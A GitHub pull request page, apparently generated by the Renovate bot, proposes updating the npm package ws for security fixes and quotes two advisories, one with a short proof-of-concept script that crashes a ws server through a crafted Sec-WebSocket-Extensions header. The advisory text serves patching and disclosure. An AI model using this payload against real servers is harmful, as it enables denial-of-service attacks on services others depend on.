Update dependency ws to 1.1.5 [SECURITY] - abandoned #28

renovate · 2021-12-12T23:42:39Z

This PR contains the following updates:

Package	Change
ws	`1.0.1` -> `1.1.5`

⚠ Dependency Lookup Warnings ⚠

Warnings were logged while processing this repo. Please check the Dependency Dashboard for more information.

GitHub Vulnerability Alerts

CVE-2016-10542

Affected versions of ws do not appropriately limit the size of incoming websocket payloads, which may result in a denial of service condition when the node process crashes after receiving a large payload.

Recommendation

Update to version 1.1.1 or later.
Alternatively, set the maxpayload option for the ws server to a value smaller than 256MB.

GHSA-5v72-xg48-5rpm

Affected versions of ws can crash when a specially crafted Sec-WebSocket-Extensions header containing Object.prototype property names as extension or parameter names is sent.

Proof of concept

const WebSocket = require('ws');
const net = require('net');

const wss = new WebSocket.Server({ port: 3000 }, function () {
  const payload = 'constructor';  // or ',;constructor'

  const request = [
    'GET / HTTP/1.1',
    'Connection: Upgrade',
    'Sec-WebSocket-Key: test',
    'Sec-WebSocket-Version: 8',
    `Sec-WebSocket-Extensions: ${payload}`,
    'Upgrade: websocket',
    '\r\n'
  ].join('\r\n');

  const socket = net.connect(3000, function () {
    socket.resume();
    socket.write(request);
  });
});

Recommendation

Update to version 3.3.1 or later.

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

If you want to rebase/retry this PR, check this box

This PR has been generated by Mend Renovate. View repository job log here.

renovate · 2023-03-16T21:27:49Z

Autoclosing Skipped

This PR has been flagged for autoclosing. However, it is being skipped due to the branch being already modified. Please close/delete it manually or report a bug if you think this is in error.

renovate bot force-pushed the renovate/npm-ws-vulnerability branch from 9a3f61e to 50f0231 Compare January 11, 2022 08:50

Update dependency ws to 1.1.5 [SECURITY]

17f10b2

renovate bot force-pushed the renovate/npm-ws-vulnerability branch from 50f0231 to 17f10b2 Compare January 19, 2022 20:10

renovate bot changed the title ~~Update dependency ws to 1.1.5 [SECURITY]~~ Update dependency ws to 1.1.5 [SECURITY] - abandoned Mar 16, 2023

renovate bot changed the title ~~Update dependency ws to 1.1.5 [SECURITY] - abandoned~~ Update dependency ws to 1.1.5 [SECURITY] - abandoned - autoclosed Apr 3, 2023

renovate bot closed this Apr 3, 2023

renovate bot deleted the renovate/npm-ws-vulnerability branch April 3, 2023 23:27

renovate bot changed the title ~~Update dependency ws to 1.1.5 [SECURITY] - abandoned - autoclosed~~ Update dependency ws to 1.1.5 [SECURITY] - abandoned Apr 4, 2023

renovate bot reopened this Apr 4, 2023

renovate bot restored the renovate/npm-ws-vulnerability branch April 4, 2023 09:39

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Update dependency ws to 1.1.5 [SECURITY] - abandoned #28

Update dependency ws to 1.1.5 [SECURITY] - abandoned #28

renovate bot commented Dec 12, 2021 •

edited

renovate bot commented Mar 16, 2023

Update dependency ws to 1.1.5 [SECURITY] - abandoned #28

Are you sure you want to change the base?

Update dependency ws to 1.1.5 [SECURITY] - abandoned #28

Conversation

renovate bot commented Dec 12, 2021 • edited

⚠ Dependency Lookup Warnings ⚠

GitHub Vulnerability Alerts

CVE-2016-10542

Recommendation

GHSA-5v72-xg48-5rpm

Proof of concept

Recommendation

Configuration

renovate bot commented Mar 16, 2023

Autoclosing Skipped

renovate bot commented Dec 12, 2021 •

edited